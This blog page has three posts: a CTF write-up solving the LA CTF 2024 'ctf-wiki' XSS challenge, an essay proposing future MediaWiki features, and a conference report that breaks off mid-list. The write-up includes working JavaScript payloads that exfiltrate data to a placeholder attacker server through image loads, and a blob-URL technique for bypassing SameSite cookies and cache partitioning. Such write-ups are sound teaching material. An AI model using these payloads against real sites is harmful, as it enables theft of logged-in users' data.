Wednesday, February 21, 2024

LA CTF write up: ctf-wiki

Last weekend I participated in LA CTF 2024. This is how I solved one of the challenges: "ctf-wiki". It was solved by 38 teams and worth 483 points.

The challenge

The challenge was an XSS problem. You can view it at the LACTF github. We are given a website that you can log into. Once you log in, you can create and edit pages, including adding arbitrary HTML (the description parameter is output unescaped). There is also a /flag page which outputs a flag if you are logged in as the admin. Finally, there is an admin bot that you can give a URL to, which it will visit while logged in as the admin. There is a CSP policy, but it specifies img-src *, which allows us to exfiltrate data in the file names of images we choose to load.

This is all a pretty standard setup for a CTF XSS challenge.

Normally you would solve a problem like this by injecting a script like this into one of the pages of the site:

<script>
fetch(
  'https://ctf-wiki.chall.lac.tf/flag',
  {method:'post'}
).then( t=>t.text() ).then( a => {
  b=new Image();
  b.src='https://MYWEBSERVERHERE/?flag='+encodeURI( a.substr( 0,50 ) );
} );
</script>

And convince the admin bot to visit the page this script has been injected into. Admin bot visits the page, executes script, loads the /flag endpoint, loads an image from my webserver with the flag in the URL (CSP was blocking cross-site fetch() but not cross-site image loads, so we exfiltrate using an image). I then check my apache access_log file, find the flag, easy-peasy.

However there is a catch.

The Twist

As I said before, there is a twist: you can only view pages on the site if logged out. Logged-in users can edit pages but not view them.
 
The admin bot is logged into the site as the admin (so it can read /flag). If we send the admin bot to the page with the injected script, it just sees the edit page. It does not execute the script.

We can work around this a few ways. Since SameSite=Lax cookies are being used, we could load the site in an <iframe> from a different domain. SameSite=Lax is a security measure that means cookies are only sent on top-level GET navigations, not when a website is loaded as a subresource from a different "site". Another way to force being logged out is to simply add a period to the end of the domain - e.g. http://ctf-wiki.chall.lac.tf./ . An obscure feature of DNS is that it can be configured to automatically add "search domains" at the end of a domain name. Adding a period to the end of the domain name turns off this rarely used feature. The end result is that ctf-wiki.chall.lac.tf. and ctf-wiki.chall.lac.tf are separate domain names that point to the same place, but web browsers consider them to be totally separate websites with separate cookies.

Thus I can point the admin bot to http://ctf-wiki.chall.lac.tf. (Plain http not https since the certificate won't match), and it will execute the script I insert into the site. Unfortunately there is another problem. The admin bot won't be logged in when fetching http://ctf-wiki.chall.lac.tf./flag, and thus it cannot read the contents of http://ctf-wiki.chall.lac.tf/flag since that would be a cross-domain request, which is prevented by the same origin policy.

This is quite a catch-22. We can either be logged in, able to read the flag but unable to run our injected script, or logged out, able to run the script but unable to read the flag it fetches. We need to be both logged in and logged out at the same time.

Popup windows

The natural solution to this problem would be a pop-up window. You could open the page with an injected script in an <iframe>. SameSite=Lax cookies are not sent to cross-site iframes, so we would be logged out in the <iframe> and execute the script. The script could use window.open() to open a pop-up window. Pop-up windows are a top-level GET navigation, so SameSite=Lax cookies will be sent, and we will be logged-in inside the pop-up. Since both the iframe and the pop-up are the same domain, they are allowed to communicate with each other; window.open() returns a window object for the pop-up, which the iframe can use to run scripts in the context of the pop-up window.
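For illustration, something like the following, injected into a wiki page and loaded inside a logged-out cross-site <iframe>, would be the rough shape of that approach. This is a sketch I never actually ran, and it assumes the pop-up is permitted and the CSP allows it:

<script>
// Sketch only: runs inside the logged-out iframe on the real domain.
// The pop-up is a top-level navigation, so it carries the admin's
// SameSite=Lax cookies, and it is same-origin with this iframe.
var w = window.open('https://ctf-wiki.chall.lac.tf/');
var timer = setInterval(function () {
  if (!w) return; // pop-up blocked
  // wait until the real (logged-in) document has finished loading
  if (w.location.href === 'about:blank' || w.document.readyState !== 'complete') return;
  clearInterval(timer);
  // issue the flag request with the pop-up as the client, then
  // exfiltrate via an image load (allowed by img-src *)
  w.fetch('https://ctf-wiki.chall.lac.tf/flag', {method: 'post'})
    .then(function (t) { return t.text(); })
    .then(function (a) {
      var b = new Image();
      b.src = 'https://MYWEBSERVERHERE/?flag=' + encodeURI(a.substr(0, 50));
    });
}, 250);
</script>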

There is only one problem - pop-up blockers. Modern browsers only allow pop-up windows if they are the result of a user action. Users have to click something. Scripts cannot create pop-up windows of their own volition.

It turns out that this is not entirely true for the contest. The admin bot had its pop-up blocker disabled, so I could have used pop-up windows. However, at the time I simply tested with my local copy of Chrome, saw it didn't work, and assumed the admin bot would be the same. An important lesson here: you should always test your assumptions. Nonetheless, let's pretend that wasn't the case: can we solve this problem without using pop-ups?

The challenge on hard mode: no pop-ups

Without pop-ups, we essentially only have <iframe>s and navigating the entire page. There are two browser features that present a challenge here:

  • SameSite=Lax cookies: This is designed so that no cookies are ever sent from requests originating cross-site except for top level GET navigations.
  • Cache partitioning - Browsers are becoming more and more concerned with user tracking. To combat this they have implemented cache partitioning. Essentially, caches are partitioned so that an <iframe> of some domain has a totally separate cache from a top level navigation to that domain. This includes APIs like ServiceWorkers that you might be able to use to control other pages on the same domain. It also includes cookies. The exact details of this vary between browsers.

This was looking pretty hopeless. After all, the entire point of cache partitioning is to prevent communication between third-party iframes and their main site. I didn't just want to communicate from a third-party iframe to its originating site; I wanted to control the originating site from the third-party website, which seems much harder than mere communication. If there were a way to communicate, it would defeat the entire point of the cache partitioning feature.
 
After much googling, I eventually came across the google chrome privacy sandbox docs. It had the following enticing line:

A blob is an object that contains raw data to be processed, and a blob URL can be generated to access the resource. Blob URL stores are not partitioned. To support a use case for navigating in a top-level context to any blob URL (discussion), the blob URL store might be partitioned by the agent cluster instead of the top-level site. This feature is not available for testing yet, and the partitioning mechanism may change in the future.

 

An exception to cache partitioning! That sounds exactly like what I needed.

What is a blob url anyways?

A blob url is kind of like a fancy data: url. They are generally of the form blob:origin/UUID. For example: blob:http://example.com/1c18cbfc-cb5a-4709-9fd4-f50bb96ab7b7. They reference some bytes associated with a specific page, and generally only last so long as the page they are associated with exists. You can use them like data: urls, for example in the src attribute of an <img> tag. Unlike data urls, blob urls don't embed the data within themselves but just reference it with a UUID, which can be helpful for large files. Normally you create them with the URL.createObjectURL() javascript API, which takes a Blob object and outputs a blob url.
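As a quick, non-challenge-specific illustration of the API:

<script>
// Turn an in-memory string into a blob url and log it.
var blob = new Blob(['<h1>hello from a blob</h1>'], {type: 'text/html'});
var url = URL.createObjectURL(blob);
console.log(url); // something like blob:https://example.com/1c18cbfc-...
// The url stays valid until the page goes away or we revoke it:
// URL.revokeObjectURL(url);
</script>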

The exciting part is:
  • Unlike data: urls, Blob urls have the same origin as the page that creates them.
  • Blob urls are exempt (for the moment at least) from cache partitioning and work across third-party contexts.
  • You can use blob urls to do top-level navigation. (data: urls have been banned from script based top level navigation)

Putting this all together, we can create a blob url from inside an iframe containing HTML of our choosing, then navigate the entire page to that blob url, where our HTML executes as if it were top level. This means that it can send SameSite cookies as well as being considered in the same cache partition as the main site (unlike the <iframe>). Hence we are logged in, inside this blob: url.

Putting it all together

To pull this off, we'll have two pages on the ctf-wiki, the actual script and an iframe wrapper.

The iframe wrapper simply looks like this. We would visit it from the extra dot url to be logged out:

 <iframe src="https://ctf-wiki.chall.lac.tf/view/4568f3f843562569a487b3ee9fb22dcf"></iframe>

The page it wraps is the interesting one:

<script>
 parent.location = URL.createObjectURL(
    new Blob( [
      "<script>" +
      "fetch('https://ctf-wiki.chall.lac.tf/flag',{method:'post'})" +
        ".then(t=>t.text())" +
        ".then(flag => { " +
            "var img = new Image();" +
            "img.src = 'https://MYWEBSITEHERE/?flag='+encodeURI(flag.substr(0,50))" + 
         "});" +
       "\x3C/script\x3E"
    ], 
    {type: "text/html"}
    )
 )
</script>

This script creates a blob url. The blob url contains an HTML page with a script that fetches the flag and exfiltrates it to my server. It then navigates the parent window (i.e. Not the <iframe> we are inside, but the page containing it) to this blob url. The blob url will then execute in a top level context with the same origin as the <iframe>. It will fetch the flag, and then send that value to my server as an image load request.

So I tried it. It didn't work :(

Looking at the browser console, I had an error saying iframes are not allowed to navigate the top window without the user clicking on something. At first, I thought the approach was dead, but then I remembered that the sandbox attribute for <iframe>s had something related to this.

Normally the sandbox attribute just takes away rights relative to being unspecified; it doesn't add any rights. However, the docs mentioned both an allow-top-navigation and an allow-top-navigation-by-user-activation sandbox keyword, the latter being the behaviour I seemed to be getting with no sandbox attribute and the former being the behaviour I wanted. It didn't seem like there would be much point in including allow-top-navigation if it was never allowed, so I thought I would try it and see what happened. I changed my iframe to be:
 
<iframe src="https://ctf-wiki.chall.lac.tf/view/4568f3f843562569a487b3ee9fb22dcf" sandbox="allow-top-navigation allow-scripts allow-same-origin"></iframe>

Then I visited the page with that iframe: http://ctf-wiki.chall.lac.tf./view/ea313ff4550b824368d39e00936ef58d (note the dot after the tf TLD). The outer page needs to be on the dotted domain so that no cookies are sent, we are logged out, and our injected XSS actually renders. The iframe needs to frame the real domain: it also won't send cookies, since it is a cross-site iframe, but it must be the real domain because the blob url inherits its origin, and we want the blob to run as the real domain.

And it worked!

The page with the iframe loaded the second page inside the iframe. That page was cookie-less, but created the blob url containing the second-stage script. It then navigated the top window to the blob url, which ran at the top level, so all the fetch() requests it made carried the appropriate cookies. It fetched the flag and sent it to my website as part of the name of a fake "image" file. I could then see the flag in my apache access log.
 
107.178.207.72 - - [18/Feb/2024:04:43:45 +0000] "GET /?flag=lactf%7Bk4NT_k33P_4lL_my_F4v0r1T3_ctF3RS_S4m3_S1t3%7D HTTP/1.1" 200 3754 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/121.0.0.0 Safari/537.36"
 
Thus the flag is: lactf{k4NT_k33P_4lL_my_F4v0r1T3_ctF3RS_S4m3_S1t3}
 

Conclusion

It is indeed possible to pivot from an XSS in an iframe to an XSS that can read data that is partitioned to the main site, without using a pop-up. Of course, the situation of having an XSS when not logged in but no XSS when actually logged in is pretty contrived. I do wonder if there are situations in the real world where using blobs to bypass SameSite cookies is applicable. I find it hard to imagine - an XSS attack is usually powerful enough to make things game over, and it would be unusual not to be able to leverage it directly.
 
The most realistic scenario I could think of where this blob behaviour might be useful would be to break out of credentialless iframes. Credentialless iframes are used for cross-origin isolated contexts (when you want your website to never share a process with any other website, in order to prevent speculative-execution-type attacks) and are not allowed to hold references to the window objects of pop-ups. Thus the usual attacks with pop-ups cannot be done. However, the blob: url method can still work to turn an XSS in a credentialless context into one that can make credentialed requests.

Anyways. It is quite weird that blobs are exempt from cache partitioning. I wonder how long that will last.



Wednesday, January 10, 2024

Imagining Future MediaWiki

 As we roll into 2024, I thought I'd do something a little different on this blog.

A common product vision exercise is to ask someone, imagine it is 20 years from now, what would the product look like? What missing features would it have? What small (or large) annoyances would it no longer have?

I wanted to do that exercise with MediaWiki. Sometimes it feels like MediaWiki is a little static. Most of the core ideas were implemented a long time ago. Sure, there is a constant stream of improvements, some quite important, but the core product has stayed essentially the same for quite some time now. People largely interact with MediaWiki the same way they always have. When I think of new fundamental features of MediaWiki, I think of things like Echo, Lua and VisualEditor, which can hardly be considered new at this point (in fairness, maybe DiscussionTools, which is quite recent, should count as a new fundamental feature). Alternatively, I might think of things that are on the edges. Wikidata is a pretty big shift, but it's a separate thing from the main experience and also over a decade old at this point.

I thought it would be fun to brainstorm some crazy ideas for new features of MediaWiki, primarily in the context of large sites like Wikipedia. I'd love to hear feedback on if these ideas are just so crazy they might work, or just crazy. Hopefully it inspires others to come up with their own crazy ideas.

What is MediaWiki to me?

Before I start, I suppose I should talk about what I think the goals of the MediaWiki platform are. What is the value that should be provided by MediaWiki as a product, particularly in the context of Wikimedia-type projects?

Often I hear Wikipedia described as a top 10 document hosting website combined with a medium scale social network. While I think there is some truth to that, I would divide it differently.

I see MediaWiki as aiming to serve 4 separate goals:

  • A document authoring platform
  • A document viewing platform (i.e. Some people just want to read the articles).
  • A community management tool
  • A tool to collect and disseminate knowledge

The first two are pretty obvious. MediaWiki has to support writing Wikipedia articles. MediaWiki has to support people reading Wikipedia articles. While I often think the difference between readers and editors is overstated (or perhaps counter-productive as hiding editing features from readers reduces our recruitment pool), it is true they are different audiences with different needs.

What I think is a bit under-appreciated sometimes, but just as important, is that MediaWiki is not just about creating individual articles; it is about creating a place where a community of people dedicated to writing articles can thrive. This doesn't just happen at the scale of tens of thousands of people; all sorts of processes and bureaucracy are needed for such a large group to work together effectively. While not all of that is in MediaWiki, the bulk of it is.

One of my favourite things about the wiki-world is that it is a socio-technical system. The software does not prescribe specific ways of working, but gives users the tools to create community processes themselves. I think this is one of our biggest strengths, which we must not lose sight of. However, we also shouldn't totally ignore this sector and assume the community is fine on its own - we should still be on the lookout for better tools to allow the community to make better processes.

Last of all, MediaWiki aims to be a tool to aid in the collection and dissemination of knowledge¹. Wikimedia's mission statement is: "Imagine a world in which every single human being can freely share in the sum of all knowledge." No one site can do that alone, not even Wikipedia. We should aim to make it easy to transfer content between sites. If a 10 billion page treatise on Pokemon is inappropriate for Wikipedia, it should be easy for an interested party to set up their own site that can house knowledge that does not fit in existing sites. We should aim to empower people to do their own thing if Wikimedia is not the right venue. We do not have a monopoly on knowledge, nor should we.

As anyone who has ever tried to copy a template from Wikipedia can tell you, making forks or splits from Wikipedia is easy in theory but hard in practice. In many ways I feel this is the area where we have most failed to meet the potential of MediaWiki.

With that in mind, here are my ideas for new fundamental features in MediaWiki:

As a document authoring/viewing platform

Interactivity

Detractors of Wikipedia have often criticized how text based it is. While there are certainly plenty of pictures to illustrate, Wikipedia has typically been pretty limited when it comes to more complex multimedia. This is especially true of interactive multimedia. While I don't have first hand experience, in the early days it was often negatively compared to Microsoft Encarta on that front.

We do have certain types of interactive content, such as videos, slippy maps and 3D models, but we don't really have any options for truly interactive content. For example, physics concepts might be better illustrated with "interactive" experiments, e.g. where you can push a pendulum with a mouse and watch what happens.

One of my favourite illustrations on the web is this one of an Enigma machine. The Enigma machine, for those not familiar, was a mechanical device used in World War 2 to encrypt secret messages. The interactive illustration shows how an inputted message goes through various wires and rotates various disks to give the scrambled output. I think this illustrates what an Enigma machine fundamentally is better than any static picture or even video ever could.

Right now there are no satisfactory solutions on Wikipedia for making this kind of content. There was a previous effort to do something in the vein of interactive content in the graph extension, which allowed using the Vega domain-specific language to make interactive graphs. I've previously written about how I think that was a good effort but ultimately missed the mark. In short, I believe it was too high level, which caused it to lack the flexibility necessary to meet the needs of users, while also being difficult to build simplifying abstractions on top of.

I am a big believer that instead of making complicated projects that prescribe certain ways of doing things, it is better to make simpler, lower-level tools that can be combined together in complex ways, as well as abstracted over so that users can make simple interfaces (essentially the Unix philosophy). On wiki, I think this has been borne out by the success of using Lua scripting in templates. Lua is low level (relative to other wiki interfaces), but users were able to use it to accomplish their goals without MediaWiki developers having to think about every possible thing they might want to do. Users were then able to make abstractions that hid the low-level details in everyday use.

To that end, what I'd like to see is Lua extended to the client side: special lua interfaces that allow calling other lua functions on the client side (run by JS), in order to make parts of the wiki page scriptable while being viewed instead of just while being generated.

I did make some early proofs of concept in this direction; see https://bawolff.net/monstranto/index.php/Main_Page for a demo of Extension:Monstranto. See also a longer piece I wrote, as well as an essay by Yurik on the subject I found inspiring.

Mobile editing

This is one where I don't really know what the answer is, but if I imagine MW in 20 years, I certainly hope this is better.

It's not just MediaWiki; I don't think any website really has authoring long text documents on mobile figured out.

That said, I have seen some interesting ideas around, that I think are worth exploring (None of these are my own ideas)

Paragraph or sentence level editing

This idea was originally proposed about 13 years ago by Jan Paul Posma. In fact, he wrote a whole bachelor's thesis on it.

In essence, mobile editing gets more frustrating the longer the text you are editing is. MediaWiki often works on editing at the granularity of a section, but what about editing at the granularity of a paragraph or a sentence instead? Especially if you just want to fix a typo on mobile, I feel it would be much easier if you could just hit the edit button on a sentence instead of the entire section.

Even better, I suspect that parsoid makes this a lot easier to implement now than it would have been back in the day.

Better text editing UI (e.g. Eloquent)

A while ago I was linked to a very interesting article by Scott Jenson about the problems with text editing on mobile. I think he articulated the reasons it is frustrating very well, and also proposed a better UI which he called Eloquent. I highly recommend reading the article and seeing if it makes sense to you.

In many ways, we can't really do this, as it is an Android-level UI, not something we control in the web app. Even if we did manage to make it in a web app somehow, it would probably be a hard sell to ordinary users not used to the new UI. Nonetheless, I think it would be incredibly beneficial to experiment with alternate UIs like these and see how far we can get. The world is increasingly going mobile, and Wikipedia is increasingly getting left behind.

Alternative editing interfaces (e.g. voice)

Maybe traditional text editing is not the way of the future. Can we do something with voice control?

It seems like voice controlled IDEs are increasingly becoming a thing. For example, here is a blog post about someone who programs with a voice programming software called Talon. It seems like there are a couple other options out there. I see Serenade mentioned quite a bit.

A project in this space that looks especially interesting is cursorless. The demo looked really cool, and I could imagine that a power user would find it easier to use a system like this to edit large blobs of WikiText than the normal text editing interface on mobile. Anyways, I recommend watching the demo video to see what you think.

All this is to say, I think we should look really hard at the possibilities in this space for editing MediaWiki from a phone. On-screen keyboards are always going to suck; we might as well look at other options.

As a community building platform

Extensibility

I think it would be really cool if we had "lua" extensions. Instead of normal php extensions, a user would be able to register/upload some lua code that gets subscribed to hooks and does stuff. In this vision, these extension types would not be able to do anything unsafe like raw html, but would be able to do all sorts of stuff that users normally use javascript for.

This could be per user or also global. Perhaps could be integrated with a permission system to control what they can and cannot do.

I'd also like to see a super stable API abstraction layer for these (and normal extensions). Right now our extension API is fairly unstable. I would love to see a simple abstraction layer with hard stability guarantees. It wouldn't replace the normal API entirely, but would allow simpler extensions to be written in such a way that they retain stability in the long term.

Workflows

I think we could do more to support user-created workflows. The Wiki is full of user-created workflows and processes; some are quite complex, others simple. For example, nominating an article for deletion or !voting in an RFC.

Sometimes the more complicated ones get turned into javascript wizards, but I think that's the wrong approach. As I said earlier, I am a fan of simpler tools that can be used by ordinary users, not complex tools that do a specific task but can only be edited by developers and exist "outside" the wiki.

There's already an extension in this area (not used by Wikimedia) called PageForms. This is in the vein of what I am imagining, but I think still too heavy. Another option in this space is the PageProperties extension which also doesn't really do what I am thinking of.

What I would really want to see is an extension of the existing InputBox/preload feature.

As it stands right now, when starting a new page or section, you can give a url parameter to preload some text as well as parameters to that text to replace $1 markers.

We also have the InputBox extension to provide a text box where you can put in the name of an article to create with specific text pre-loaded.

I'd like to extend this idea, to allow users to add arbitrary widgets² (form elements) to a page, and bind those widgets to specific parameters to be preloaded.

If further processing or complex logic is needed, perhaps an option to allow the new preloaded text to be pre-processed by a lua module. This would allow complex logic in how the page is edited based on the user's inputs. If there is one theme in this blog post, it is I wish lua could be used for more things on wiki.

I still imagine the user would be presented with a diff view and have to press save, in order to prevent shenanigans where users are tricked into doing something they don't intend to.

I believe this is a very light-weight solution that also gives the community a lot of flexibility to create custom workflows in the wiki that are simple for editors to participate in.

Querying, reporting and custom metadata

This is the big controversial one.

I believe that there should be a way for users to attach custom metadata to pages and do complex queries over that metadata (including aggregation). This is important both for organizing articles as well as organizing behind the scenes workflows.

In the broader MediaWiki ecosystem, this is usually provided by either the SemanticMediaWiki or Cargo extensions. Often in third party wikis this is considered MediaWiki's killer feature. People use them to create complex workflows including things like task trackers. In essence it turns MediaWiki into a no-code/low-code user programmable workflow designer.

Unfortunately, these extensions all scale poorly, preventing their use on Wikimedia. Essentially I dream of seeing the features provided by these extensions on Wikipedia.

The existing approaches are as follows:

  • Vanilla MediaWiki: Category pages, and some query pages.
    • This is extremely limited. Category pages allow an alphabetical list. Query pages allow some limited pre-defined maintenance lists like list of double redirects or longest articles. Despite these limitations, Wikipedia makes great use out of categories.
  • Vanilla mediawiki + bots:
    • This is essentially Wikipedia's approach to solving this problem. Have programs do queries offsite and put the results on a page. I find this to be a really unsatisfying solution. A Wikipedian once told me that every bot is just a hacky workaround to MediaWiki failing to meet its users' needs, and I tend to agree. Less ideologically, the main issue here is it's very brittle - when bots break, often nobody knows who has access to the code or how it can be fixed. Additionally, they often have significant latency for updates (if they run once a week, then the latency is 7 days), and ordinary users are not really empowered to create their own queries.
  • Wikidata (including the WDQS SPARQL endpoint)
    • Wikidata is adjacent to this problem, but not quite trying to solve it. It is more meant as a central clearinghouse for facts, not a way to do querying inside Wikipedia. That said Wikidata does have very powerful query features in the form of SPARQL. Sometimes these are copied into Wikipedia via bots. SPARQL of course has difficult to quantify performance characteristics that make it unsuitable for direct embedding into Wikipedia articles in the MediaWiki architecture. Perhaps it could be iframed, but that is far from being a full solution.
  • SemanticMediaWiki
    •  This allows adding Semantic annotations to articles (i.e. Subject-verb-object type relations). It then allows querying using a custom semantic query language. The complexity of the query language makes performance hard to reason about, and it often scales poorly.
  • Cargo
    • This is very similar to SemanticMediaWiki, except it uses a relational paradigm instead of a semantic paradigm. Essentially users can define DB tables. Typically the workflow is template based, where a template is attached to a table, and specific parameters to the template are populated into the database. Users can then use (Sanitized) SQL queries to query these tables. The system uses an indexing strategy of adding one index for every attribute in the relation.
  • DPL
    • DPL is an extension to do complex querying and display using MediaWiki's built in metadata like categories. There are many different versions of this extension, but all of them have potential queries that scale linearly with the number of pages in the database, and sometimes even worse.

I believe none of these approaches really work for Wikipedia. They either do not support complex queries or allow too complex queries with unpredictable performance. I think the requirements are as follows:

  • Good read scalability. By "read" I mean scalability when generating pages (during "parse" in MediaWiki speak); on Wikipedia, pages are read and regenerated a lot more often than they are edited.
    • We want any sort of queries to have very low read latency. Having long pauses waiting for I/O during page parsing is bad in the MediaWiki architecture.
    • Queries should scale consistently. They should at worst be roughly O(log n) in the number of pages on the wiki. If using a relational-style database, we would want the number of rows the DBMS has to look at to be bounded by a fixed maximum.
  • Eventual write consistency
    • It is ok if it takes a few minutes for things using the custom metadata to update after it is written. Templates already have a delay for updating.
    • That said, it should still be relatively quick. On the order of minutes ideally. If it takes a day or scales badly in terms of the size of the database, that would also be unacceptable.
    • write performance does not have to scale quite as well as read performance, but should still scale reasonably well. 
  • Predictable performance.
    • Users should not be able to do anything that negatively impacts site performance
    • Users should not have to be an expert (or have any knowledge) in DB performance or SQL optimization.
    • Limits should be predictable. Timeouts suck, they can vary depending on how much load the site is under and other factors. Queries should either work or not work. Their validity should not be run-time dependent. It should be obvious to the user if their query is an acceptable query before they try and run it. There should be clear rules about what the limits of the system are.
  • Results should be usable for further processing
    • e.g. You should be able to use the result inside a lua module and format it in arbitrary ways
  • [Ideally] Able to be isolated from the main database, shardable, etc.
  • Be able to query for a specific page, a range of pages, or aggregates of pages (e.g. Count how many pages are in a range, average of some property, etc)
    • Essentially we want just enough complexity to do interesting user defined queries, but not enough that the user is able to take any action that affects performance.
    • There are some other query types that are more obscure but maybe harder. For example geographic related queries. I don't think we need to support that.
    • Intersection queries are an interesting case, as they are often useful on wiki. Ideally we would support that too.

 

Given these constraints I think the CouchDB model might be the best match for on-wiki querying and reporting.

Much of the CouchDB marketing material is aimed around their local-data eventual-consistency replication story, which is cool and all, but not what I'm interested in here. A good starting point for how their data model works is their documentation on views. To be clear, I'm not necessarily suggesting using CouchDB, just that its data model seems like a good match to the requirements.

CouchDB is essentially a document database based around the ideas of map-reduce. You can make views which are similar to an index on a virtual column in mysql. You can also make reduce functions which calculate some function over the view. The interesting part is that the reduce function is indexed in a tree fashion, so you can efficiently get the value of the function applied to any contiguous range of the rows in logarithmic time. This allows computing aggregations of the data very efficiently. Essentially all the read queries are very efficient. Potentially write queries can be less so, but it is easy to build controls around that. Creating or editing reduce functions is expensive because it requires regenerating the index, but that is expected to be a rare operation and users can be informed that results may be unreliable until it completes.
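To make that concrete, here is roughly what a view definition looks like in a CouchDB design document. This is a sketch of CouchDB's own JavaScript map/reduce syntax with made-up field names, not a proposed MediaWiki interface:

// A view in a CouchDB design document (sketch). The map function emits
// one key/value pair per matching document; the reduce function is
// maintained in a tree of partial results, so it can be evaluated over
// any key range in logarithmic time.
{
  "_id": "_design/pages",
  "views": {
    "population_by_country": {
      "map": "function (doc) { if (doc.country) { emit(doc.country, doc.population); } }",
      "reduce": "_sum"
    }
  }
}

Querying that view with a startkey/endkey range (with reduce enabled) returns the sum over just that key range without scanning the whole database, which is exactly the property that makes the model attractive here.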

In short, the way the CouchDB data model works as applied to MediaWiki could be as follows:

  • There is an emit( relationName, key, data ) function added to lua. In many ways this is very similar to adding a page to a category named relationName with a sortkey specified by key. data is optional extra data associated with this item. For performance reasons, there may be a (high) limit on the max number of emit() calls per page to prevent DB size from exploding.
  • Lua gets a function query( relationName, startKey, endKey ). This returns all pages between startKey and endKey and their associated data. If there are more than X (e.g. 200) number of pages, only return the first X.
  • Lua gets a queryReduced( relationName, reducerName, startKey, endKey ) which returns the reduction function over the specified range. (Main limitation here is the reduce function output must be small in size in order to make this efficient)
  • A way is added to associate a lua module as a reduce function. Adding or modifying these functions is potentially an expensive operation. However, it is probably acceptable to the user that this takes some time.

All the query types here are efficient. It is not as powerful as arbitrary SQL or semantic queries, but it is still quite powerful. It allows computing fairly arbitrary aggregation queries as well as returning results in a user-specified order. The main slow part is when a reduction function is edited or added, which is similar to how a template used on very many pages can take a while to update. Emitting a new item may also be a little slower than reading, since the reducers have to be updated up the tree (with possible contention on the root node); however, that is a much rarer operation, and users would likely see it as similar to current delays in updating templates.

I suspect such a system could also potentially support intersection queries with reasonable efficiency subject to a bunch of limitations.

All performance limitations are pretty easy for the user to understand. There is some max number of items that can be emit() from a page to prevent someone from emit()ing 1000 things per page. There is a max number of results that can be returned from a query to prevent querying the entire database, and a max number of queries allowed to be made from a page. The queries involve reading a limited number of rows, often sequential. The system could probably be sharded pretty easily if a lot of data ends up in the database.

I really do think this sort of query model provides the sweet spot of complex querying but predictable good performance and would be ideal for a MediaWiki site running at scale that wanted SMW style features.

As a knowledge collection tool

Wikipedia can't do everything. One thing I'd love to see is better integration between different MediaWiki servers to allow people to go to different places if their content doesn't fit in Wikipedia.

Template Modularity/packaging

Anyone who has ever tried to use Wikipedia templates on another wiki knows it is a painful process. Finding all the dependencies is complex, not to mention if they rely on Wikidata or JsonConfig (Commons data: namespace).

The templates on a Wiki are not just user content, but complex technical systems. I wish we had better systems for packaging and distributing them.

Even within the Wikimedia movement, there is often a call for global templates. A good idea certainly, but it would be less critical if templates could be bundled up and shared. Even still, having distinct boundaries around templates would probably make global templates easier than the current mess of dependencies.

I should note that there are extensions already in this vein, for example Extension:Page_import and Extension:Data_transfer. All of them are nice and all, but I think it would maybe be cooler to have the concept of discrete template/module units on wiki, so that different components are organized together in a way that is easier to follow.

Easy forking

Freedom to fork is the freedom from which all others flow. In addition to giving people who disagree with the status quo an avenue to do their own thing, easy forking/mirroring is critical when censorship is at play and people want to mirror Wikipedia somewhere we cannot normally reach. However, running a wiki the size of English Wikipedia is quite hard, even if you don't have any traffic. Simply importing an XML dump into a MySQL DB can be a struggle at the sizes we are talking about.

I think it would be cool if we made ready-to-go sqlite db dumps, perhaps packaged as a phar archive with MediaWiki, so you could essentially just download a huge 100 GB file, plop it somewhere, and have a mirror/fork.

Even better if it could integrate with EventStream to automatically keep things up to date.

Conclusion

So those are my crazy ideas for what I think is missing in MediaWiki (with an emphasis on the Wikipedia use case and not the third-party use case). Agree? Disagree? Hate it? I'd love to know. Maybe you have your own crazy ideas. You should post them; after all, your crazy idea cannot become reality if you keep it to yourself!

Notes:

¹ I left out "Free", because as much as I believe in "Free Culture" I believe the free part is Wikimedia's mission but not MediaWiki's.

² To clarify, by widgets I mean buttons and text boxes. I do not mean widgets in the sense of the MediaWiki extension named "Widgets".

Tuesday, November 14, 2023

WikiConference North America 2023 (part 1)

 


 This weekend I attended WikiConference North America. I decided to go somewhat at the last moment, but am really glad I did. This is the first non-technical Wikimedia community conference I have attended since COVID and it was great to hear what the Wikipedia community has been up to.

I was on a bit of a budget, so I decided to get a cheaper hotel that was about an hour away by public transit from the venue. I don't think I'll do that again. Getting back and forth was really smooth - Toronto has great transit. However, it meant an extra hour at the end of the day to get back, and waking up an hour earlier to get there on time, which really added up. By the end I was pretty tired and would much rather have had an extra 2 hours of sleep (or an extra 2 hours chatting with people).

Compared to previous iterations of this conference, there was a much heavier focus on on-wiki governance, power users and "lower-case s" Wikipedia (not Wikimedia) strategy. I found this quite refreshing and interesting, since I mostly do MediaWiki dev stuff and do not hear about the internal workings of Wikipedia as much. Previous versions of this conference focused too much (imho) on talks about outreach, which, while important, were often a bit repetitive. The different focus was much more interesting to me.

Key Take-aways

My key take away from this conference was that there is a lot of nervousness about the future. Especially:

  • Wikipedia's power-user demographics curve is shifting in a concerning way. Particularly around admin promotion.
  • AI is changing the way we consume knowledge, potentially cutting Wikipedia out, and this is scary
  • A fear that the world is not as it once was and the conditions that created Wikipedia are no longer present. As the keynote speaker Selena Deckelmann phrased it, "Is Wikipedia a one-generation marvel?"

However, I don't want to overstate this. It's unclear to me how pervasive this view is. Lots of presenters presented views of that form, but does the average Wikipedian agree? If so, is it more an intellectual agreement, or are people actually nervous? I am unsure. My read on it is that people were vaguely nervous about these things, but by no means was anyone panicking about them. Honestly though, I don't really know. However, I think some of these concerns are undercut by there being a long history of people worried about similar things, and yet Wikipedia has endured. Before admin demographics, people were panicking about new user retention. Before the worry was AI changing the way we consume content, it was mobile (a threat which I think is actually a much bigger deal).

Admin demographics

That said, I never quite realized the scale of the admin demographic crisis. People always talk about there being fewer admin promotions now than in the past, but I did not realize until it was pointed out that it is not just a little bit fewer but allegedly 50 times fewer. There is no doubt that a good portion of the admin base are people who started a decade (or 2) ago, and new admins are fewer and further between.

A particular thing that struck me as related to this at the conference, is how the definition of "young" Wikipedian seems to be getting older. Occasionally I would hear people talk about someone who is in high school as being a young Wikipedian, with the implication that this is somewhat unusual. However when you talk to people who have been Wikipedians for a long time, often they say they were teenagers when they started. It seems like Wikipedians being teenagers was a really common thing early in the project, but is now becoming more rare.

Ultimately though, I suspect the problem will solve itself with time. As more and more admins retire, the workload on those remaining will increase until the mop is handed out more readily out of necessity. I can't help but be reminded of all the panic over new user retention, until eventually people basically decided that it didn't really matter.

AI

As far as AI goes, hating AI seems to be a little bit of a fad right now. I generally think it is overblown. In the Wikipedia context, this seems to come down to three things:

  • Deepfakes and other media manipulation to make it harder to have reliable sources (Mis/Dis-information)
